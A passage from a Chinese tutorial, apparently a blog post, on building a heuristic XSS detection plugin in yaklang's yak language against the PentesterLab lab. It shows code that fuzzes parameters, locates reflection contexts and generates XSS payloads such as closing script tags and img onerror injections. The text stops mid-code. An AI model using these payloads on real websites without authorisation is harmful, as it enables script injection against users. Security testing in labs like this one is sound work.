背景
上一篇介绍了XSS 启发式检测基础设施,本篇通过yak提供的基础设施编写一个xss检测插件。
本次xss靶场使用pentesterlab的xss靶场。
点击此处即可领取282G网络安全零基础学习资料
环境部署
git clone https://github.com/yaklang/vulinone
cd php-web-for-pentester
docker-compose up -d
编写思路
参考上一期XSS 启发式检测基础设施中的思维导图:
为了实现启发式漏洞检测,需要对目标环境进行检测:
-
检测目标过滤了哪些字符、语句,过滤掉受过滤影响的payload,减少无效发包。
-
检测哪个参数在html有回显、回显位置。
-
猜测目标生成html方式,模板生成?还是后端拼接的html?
所以我们的思路可以大致形成这样的思维导图:
判断回显位置
这里先生成随机数,然后进行fuzz,最后使用xhtml.Find
方法找到字符串的回显位置。
randStr = str.RandStr(5)
respChannel, err = param.Fuzz(randStr).Exec()
die(err)
rssp = <-respChannel
rawBody, err = str.ExtractBodyFromHTTPResponseRaw(rssp.ResponseRaw)
die(err)
matchNodes = xhtml.Find(rawBody, randStr)
根据回显位置分类并生成对应payload
这里我们简单地将回显位置分为四类,对于不同类型我们构造不同的payload。
1.(tag)标签内文本: 构造标签闭合
2.(attr)属性: 构造标签闭合或伪协议,如果是特殊属性可以直接使用javascript代码
3.(comment)注释:构造标签闭合
4.(js)script 标签内:构造标签闭合或dom型
示例代码如下:
我们可以看到node中有许多方便的方法可以很简单地获取这个节点的详细信息,如节点类型(Text,Comment,Attr等),节点标签名。
根据获取到的信息我们可以来将回显分类并生成对应的payload,这里还有一些特殊的处理,比如判断回显是否在引号内,判断是否是特殊属性等。
payloads = []
for _, matchNode = range matchNodes {
if matchNode.IsText() {
/*
4. script标签内
例:<script>a = '<参数>';</script>
*/
if matchNode.TagName == "script" {
// 引号判断
matchText = matchNode.MatchText
randStrIndex = str.Index(matchNode.MatchText, randStr)
quote = ""
for {
randStrIndex -= 1
if randStrIndex < 0{
break
}
chr = string(matchText[randStrIndex])
if chr == "=" {
break
} elif chr == "\"" {
quote = "\""
}elif chr == "'" {
quote = "'"
}
}
payloads = append(payloads, newPayload(sprintf("1%s;prompt('%s');%s", quote, verifyRandStr, quote), ";"+quote, "js"))
payloads = append(payloads, newPayload(sprintf("1%s;</%s><img id='%s' src=1 onerror='prompt(1)'><%s>%s", quote, matchNode.TagName, verifyRandStr, matchNode.TagName, quote), "<>"+quote, "tag"))
} else {
/*
1.标签内文本: 构造标签闭合
例:<div><参数></div>
*/